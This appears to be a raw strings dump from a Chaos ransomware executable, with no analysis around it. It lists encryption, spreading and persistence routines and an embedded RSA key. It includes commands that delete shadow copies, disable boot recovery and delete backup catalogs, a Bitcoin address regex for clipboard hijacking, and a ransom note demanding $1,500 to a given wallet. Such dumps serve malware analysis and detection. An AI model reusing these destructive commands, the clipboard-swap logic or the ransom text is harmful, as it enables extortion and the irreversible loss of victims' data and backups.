!This program cannot be run in DOS mode.
`.rsrc
@.reloc
\ /od
v4.0.30319
#Strings
<Module>
Chaos Ransomware2.exe
Program
ConsoleApplication7
NativeMethods
driveNotification
NotificationForm
mscorlib
System
Object
System.Windows.Forms
userName
userDir
appMutexRun
encryptionAesRsa
encryptedFileExtension
checkSpread
spreadName
checkCopyRoaming
processName
appMutexRun2
checkStartupFolder
checkSleep
sleepTextbox
base64Image
appMutexStartup
droppedMessageTextbox
checkAdminPrivilage
checkdeleteShadowCopies
checkdisableRecoveryMode
checkdeleteBackupCatalog
appMutexStartup2
appMutex2
staticSplit
appMutex
System.Text.RegularExpressions
appMutexRegex
messages
validExtensions
SystemParametersInfo
sleepOutOfTempFolder
AlreadyRunning
random_bytes
Random
random
RandomString
RandomStringForExtension
Base64EncodeString
randomEncode
encryptDirectory
rsaKey
CreatePassword
AES_Encrypt
EncryptFile
RSAEncrypt
lookForDirectories
copyRoaming
copyResistForAdmin
addLinkToStartup
addAndOpenNote
registryStartup
spreadIt
runCommand
deleteShadowCopies
disableRecoveryMode
deleteBackupCatalog
SetWallpaper
AddClipboardFormatListener
SetParent
intpreclp
currentClipboard
RegexResult
Message
WndProc
CreateParams
get_CreateParams
GetText
SetText
action
uParam
vParam
winIni
length
plainText
location
bytesToBeEncrypted
passwordBytes
textToEncrypt
publicKeyString
commands
base64
System.Runtime.InteropServices
MarshalAsAttribute
UnmanagedType
hWndChild
hWndNewParent
pattern
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
Chaos Ransomware2
DllImportAttribute
user32.dll
<Main>b__0
System.Threading
ThreadStart
CS$<>9__CachedAnonymousMethodDelegate1
CompilerGeneratedAttribute
Environment
Thread
Application
System.Reflection
Assembly
GetEntryAssembly
get_Location
System.IO
GetDirectoryName
SpecialFolder
GetFolderPath
String
op_Inequality
System.Diagnostics
Process
GetProcesses
GetCurrentProcess
ProcessModuleCollection
get_Modules
ProcessModule
get_Item
get_FileName
GetExecutingAssembly
op_Equality
get_Id
Exception
NextBytes
System.Text
StringBuilder
get_Length
get_Chars
Append
ToString
Encoding
get_UTF8
GetBytes
Convert
ToBase64String
Concat
<>c__DisplayClass3
extension
<encryptDirectory>b__2
ToLower
Directory
GetFiles
GetExtension
GetFileName
Predicate`1
Exists
FileInfo
FileSystemInfo
FileAttributes
set_Attributes
GetString
WriteAllText
ToInt32
WriteAllLines
GetDirectories
AppendLine
<PrivateImplementationDetails>{E12115C2-EC4F-43BA-973B-A8C611ADF451}
$$method0x600000e-1
RuntimeHelpers
RuntimeFieldHandle
InitializeArray
MemoryStream
System.Security.Cryptography
RijndaelManaged
SymmetricAlgorithm
set_KeySize
set_BlockSize
Rfc2898DeriveBytes
get_KeySize
DeriveBytes
set_Key
get_BlockSize
set_IV
CipherMode
set_Mode
ICryptoTransform
CreateEncryptor
CryptoStream
Stream
CryptoStreamMode
IDisposable
Dispose
ToArray
ReadAllBytes
RSACryptoServiceProvider
AsymmetricAlgorithm
FromXmlString
Encrypt
set_PersistKeyInCsp
DriveInfo
GetDrives
AppDomain
get_CurrentDomain
get_FriendlyName
ProcessStartInfo
set_WorkingDirectory
set_StartInfo
Delete
set_UseShellExecute
set_Verb
ProcessWindowStyle
set_WindowStyle
System.ComponentModel
Win32Exception
get_NativeErrorCode
get_ProcessName
StreamWriter
TextWriter
WriteLine
Replace
Microsoft.Win32
Registry
RegistryKey
CurrentUser
OpenSubKey
SetValue
set_FileName
set_Arguments
WaitForExit
GetTempPath
FromBase64String
WriteAllBytes
.cctor
get_UserName
IntPtr
Control
get_Handle
get_Success
get_Msg
StartsWith
Contains
get_ExStyle
set_ExStyle
<>c__DisplayClass1
ReturnValue
<GetText>b__0
Clipboard
ApartmentState
SetApartmentState
<>c__DisplayClass4
<SetText>b__3
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
abcdefghijklmnopqrstuvwxyz0123456789
<EncyptedKey>
<EncyptedKey>
<?xml version="1.0" encoding="utf-16"?>
<RSAParameters xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<Exponent>AQAB</Exponent>
<Modulus>tCkebopomciM7JzT6en7F7JQ5QVLzfEHxwYa3Juu/P4Ts8jooHkH73mGzxjNINuyEm9IR4GyNru7S7nTDvgT/x/x8yD0ZeO5/UB3ism5fO+ft5aig51rtoNOztMX7XLwiUA6ZiCPagOb6mqKsePeky7Ux9gxydIqKZU/JS+O108=</Modulus>
</RSAParameters>
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/
<EncryptedKey>
\Desktop
\Links
\Contacts
\Documents
\Downloads
\Pictures
\Music
\OneDrive
\Saved Games
\Favorites
\Searches
\Videos
[InternetShortcut]
URL=file:///
IconIndex=0
IconFile=
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Microsoft Store
cmd.exe
vssadmin delete shadows /all /quiet & wmic shadowcopy delete
bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
C:\Users\
7z459ajrk722yn8c5j4fg
surprise.exe
svchost.exe
2X28tfRmWaPyPQgvoHV
#base64Image
1qw0ll8p9m8uezhqhyd
read_it.txt
17CqMQFeuB3NTzJ
(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})
----> Chaos is multi language ransomware. Translate your note to any language <----
All of your files have been encrypted
Your computer was infected with a ransomware virus. Your files have been encrypted and you won't
be able to decrypt them without our help.What can I do to get my files back?You can buy our special
decryption software, this software will allow you to recover all of your data and remove the
ransomware from your computer.The price for the software is $1,500. Payment can be made in Bitcoin only.
How do I pay, where do I get Bitcoin?
Purchasing Bitcoin varies from country to country, you are best advised to do a quick google search
yourself to find out how to buy Bitcoin.
Many of our customers have reported these sites to be fast and reliable:
Coinmama - hxxps://www.coinmama.com Bitpanda - hxxps://www.bitpanda.com
Payment informationAmount: 0.1473766 BTC
Bitcoin Address: bc1qlnzcep4l4ac0ttdrq7awxev9ehu465f2vpt9x0
.contact
.settings
.mhtml
.torrent
.backup
.accdb
.ibank
.wallet
.onepkg
.accde
.config
.accdr
.accdt
.accda
.accdc
.accdw
.swift
.tar.gz
.onetoc2
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
Chaos Ransomware2.exe
LegalCopyright
OriginalFilename
Chaos Ransomware2.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0